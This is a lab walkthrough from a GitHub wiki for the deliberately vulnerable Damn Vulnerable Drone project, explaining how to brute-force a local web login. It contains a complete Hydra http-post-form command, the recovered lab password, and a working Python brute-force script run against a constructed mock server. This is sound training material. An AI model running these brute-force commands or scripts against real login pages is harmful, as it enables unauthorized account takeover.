Companion Computer Web UI Login Brute Force - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki
Executing password brute force attacks on the companion computer's web-based user interface using Hydra.
This scenario involves using Hydra, a popular brute-force tool, to crack the login credentials for the Companion Computer's Web UI located at http://localhost:3000. By following this guide, you will learn how to perform a password attack on a web-based interface and understand the principles of brute-forcing login forms via HTTP POST.
⚠️ Solution Guide
sudo apt-get install hydra
Most Kali Linux images already include Hydra by default.
Open http://localhost:3000 in your browser. Use DevTools (right-click → Inspect → Network tab), submit a test login, and inspect the resulting request and response to find:
- The login form POST endpoint (e.g., /login)
- The form field names (e.g., username, password)
- The response string that indicates a failed login (e.g., "Invalid credentials")
You can use the built-in password list from Damn Vulnerable Drone:
https://github.com/nicholasaleks/Damn-Vulnerable-Drone/tree/master/simulator/mgmt/templates/pages/attacks/injection/passwords.txt
Download it or use your own custom wordlist.
Assuming the username is admin, the password list is named passwords.txt, and the Web UI is listening on localhost port 3000:
hydra -l admin -P passwords.txt -s 3000 localhost http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid"
- -l sets the username
- -P specifies the password list
- -s 3000 sets the port (Hydra's http-post-form module otherwise defaults to 80)
- localhost is the target host; Hydra requires one and will not run without it
- http-post-form targets the login route; Hydra substitutes ^USER^ and ^PASS^ with each username and password candidate
- :Invalid tells Hydra what string in the response indicates a failed login; any response that does not contain it is reported as a hit
If successful, Hydra will display the cracked credentials:
[3000][http-post-form] host: localhost login: admin password: cyberdrone
You can now log into the Companion Computer Web UI with the recovered credentials.
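To make the mechanics behind the Hydra command concrete, here is an added example (not code from the Damn Vulnerable Drone project or this wiki) that reimplements what Hydra's http-post-form module does: POST each candidate to the login route and treat a response without the failure string as a hit. So that it runs offline, it talks to a constructed in-process mock of the Web UI rather than the real companion computer; the mock's route (/login), field names (username, password), failure string ("Invalid credentials"), the 302-on-success behaviour and the valid credential pair are all assumptions made up for this example, as is the short wordlist standing in for passwords.txt.

```python
"""Added example: a minimal http-post-form brute-forcer in the style of Hydra,
run against a constructed mock login form (not the real DVD Web UI)."""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed mock credential and failure string; assumptions for this example.
MOCK_USER = "admin"
MOCK_PASS = "cyberdrone"
FAILURE_STRING = "Invalid credentials"

# Constructed wordlist standing in for passwords.txt.
WORDLIST = ["password", "drone123", "admin", "cyberdrone", "letmein"]


class MockLoginHandler(BaseHTTPRequestHandler):
    """Stand-in for the companion computer Web UI login form (constructed)."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if self.path == "/login" and user == MOCK_USER and password == MOCK_PASS:
            # Assumed success behaviour: redirect to the dashboard.
            self.send_response(302)
            self.send_header("Location", "/dashboard")
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(f"<p>{FAILURE_STRING}</p>".encode())

    def log_message(self, *args):  # keep request logging quiet
        pass


def start_mock_server():
    """Bind the mock to an ephemeral loopback port and serve it in a thread."""
    server = HTTPServer(("127.0.0.1", 0), MockLoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def attempt_login(host, port, path, user, password, timeout=5):
    """POST one credential pair as application/x-www-form-urlencoded, the way
    Hydra's http-post-form module does, and return (status, body).
    http.client does not follow redirects, so a 302 is seen as a 302."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    data = urllib.parse.urlencode({"username": user, "password": password})
    conn.request("POST", path, body=data,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def brute_force(host, port, path, user, wordlist, failure_string,
                success_status=None):
    """Try each candidate in order and return the first one that does not
    produce failure_string in the response (Hydra's ':Invalid' condition)."""
    for candidate in wordlist:
        status, body = attempt_login(host, port, path, user, candidate)
        if failure_string in body:
            continue
        # Caveat: a failure-string check alone reports any page that lacks the
        # string (an error page, a lockout or rate-limit notice) as a hit.
        # Optionally requiring the expected success status narrows that.
        if success_status is None or status == success_status:
            return candidate
    return None


def run_demo(wordlist=WORDLIST):
    """Spin up the mock, brute-force it, and return the recovered password
    (None if no candidate in the wordlist worked)."""
    server = start_mock_server()
    try:
        return brute_force("127.0.0.1", server.server_port, "/login",
                           MOCK_USER, wordlist, FAILURE_STRING,
                           success_status=302)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("recovered password:", run_demo())
```

The success_status check is the part worth carrying back to Hydra: when the target answers anything other than the normal failure page (a 429 after too many attempts, a 500 from a crashed handler), a failure-string-only condition produces a false positive, so confirm any reported hit by logging in manually, or use Hydra's "S=" success-string form of the condition when the success response has a reliable marker.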